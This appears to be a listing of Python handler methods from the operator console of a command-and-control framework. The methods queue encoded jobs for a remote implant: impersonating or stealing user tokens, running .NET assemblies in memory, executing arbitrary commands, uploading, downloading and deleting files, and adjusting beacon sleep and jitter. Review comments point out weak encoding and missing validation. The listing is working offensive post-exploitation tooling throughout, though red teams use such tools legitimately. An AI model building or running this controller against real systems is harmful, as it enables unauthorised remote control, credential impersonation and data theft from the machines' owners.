Beispiel #1
 def do_make_token(self, args: argparse.Namespace):
     """ Impersonate a user's token. """
     # Each field is encoded on its own, so a comma inside a value cannot be
     # confused with the commas that separate the three arguments.
     # NOTE(review): assuming string_to_base64 is plain Base64, that is an
     # encoding, not encryption. The password can be recovered from the job
     # string by anything that logs, stores or relays it; any confidentiality
     # has to come from whatever post_job does (not visible here).
     domain_enc, user_enc, secret_enc = map(
         string_to_base64,
         (args.domain, args.username, args.password),
     )
     job = f'"name":"make_token","arguments":"{domain_enc},{user_enc},{secret_enc}","type":1'
     self.post_job(job)
Beispiel #2
 def do_delay(self, args: argparse.Namespace):
     """ Change the sleep and jitter to alter the check_in interval. """
     # Neither value supplied: queue the argument-less "delay" job and stop.
     if not (args.sleep or args.jitter):
         self.post_job('"name":"delay","arguments":"","type":1')
         return

     # Sleep is queued first and independently of the jitter check below, so
     # a rejected jitter value still leaves the sleep job posted.
     if args.sleep:
         sleep_value = float(args.sleep)
         sleep_enc = string_to_base64(str(sleep_value))
         self.post_job(f'"name":"set sleep","arguments":"{sleep_enc}","type":1')

     if not args.jitter:
         return

     jitter_value = float(args.jitter)
     # NOTE(review): float('nan') fails both comparisons and therefore passes
     # this range check; a non-numeric value raises ValueError from float().
     if jitter_value < 0 or jitter_value > 100:
         print_error(
             'Please set jitter to a number between 0 and 100 inclusive.'
         )
         return
     jitter_enc = string_to_base64(str(jitter_value))
     self.post_job(f'"name":"set jitter","arguments":"{jitter_enc}","type":1')
Beispiel #3
 def do_execute_assembly(self, args: argparse.Namespace):
     """ Executes a .NET assembly with reflection """
     # The whole file is read into memory before it is transformed.
     with open(args.assembly, 'rb') as handle:
         raw_assembly = handle.read()
     # NOTE(review): the key returned by xor_base64 travels in the same
     # arguments string as the data it was applied to, so whatever the helper
     # does it gives no confidentiality against anyone who can read the job
     # string. Presumably obfuscation only; confirm against xor_base64.
     key, payload = xor_base64(raw_assembly)
     # Every extra argument is encoded separately and prefixed with a comma,
     # so an empty args.args contributes nothing to the job string.
     encoded_args = ''.join(
         ',' + string_to_base64(item) for item in args.args
     )
     job = f'"name":"execute_assembly","arguments":"{key},{payload}{encoded_args}","type":1'
     self.post_job(job)
Beispiel #4
 def do_steal_token(self, args: argparse.Namespace):
     """ Impersonate a processes token. """
     # args.pid goes to the encoder exactly as parsed; this method performs
     # no integer or range check on it.
     encoded_pid = string_to_base64(args.pid)
     job = f'"name":"steal_token","arguments":"{encoded_pid}","type":1'
     self.post_job(job)
Beispiel #5
 def do_dir(self, args: argparse.Namespace):
     """ List the contents and properties of a directory. """
     # The path is encoded before interpolation so quotes or commas in it
     # cannot break the hand-built job string (assuming the helper emits the
     # standard Base64 alphabet; confirm against string_to_base64).
     encoded_dir = string_to_base64(args.dir)
     job = f'"name":"dir","arguments":"{encoded_dir}","type":1'
     self.post_job(job)
Beispiel #6
 def do_cmd(self, args: argparse.Namespace):
     """ Execute a command. """
     # The command text is forwarded as given (only encoded); this method
     # applies no validation or allow-list. post_job is the one call that
     # every command in this listing goes through, which makes it the
     # natural place for audit logging of what was queued.
     encoded_command = string_to_base64(args.command)
     job = f'"name":"cmd","arguments":"{encoded_command}","type":1'
     self.post_job(job)
Beispiel #7
 def do_upload(self, args: argparse.Namespace):
     """ Uploads a file to the remote machine. """
     # The local file is read in full and embedded in a single job string;
     # no size limit is enforced here.
     with open(args.file, 'rb') as handle:
         raw_bytes = handle.read()
     encoded_file = bytes_to_base64(raw_bytes)
     # Destination path on the remote side, encoded like every other argument.
     encoded_path = string_to_base64(args.path)
     job = f'"name":"upload","arguments":"{encoded_file},{encoded_path}","type":1'
     self.post_job(job)
Beispiel #8
 def do_download(self, args: argparse.Namespace):
     """ Download a remote file. """
     encoded_file = string_to_base64(args.file)
     # NOTE(review): this is the only job in the listing posted with
     # "type":2 instead of 1. The meaning of the type field is not visible
     # here; presumably it marks jobs that return file data. Confirm against
     # post_job or the server side.
     job = f'"name":"download","arguments":"{encoded_file}","type":2'
     self.post_job(job)
Beispiel #9
 def do_delfile(self, args: argparse.Namespace):
     """ Delete a file. """
     # Destructive and queued without a confirmation step in this method;
     # the path is forwarded as given, only encoded.
     encoded_file = string_to_base64(args.file)
     job = f'"name":"delfile","arguments":"{encoded_file}","type":1'
     self.post_job(job)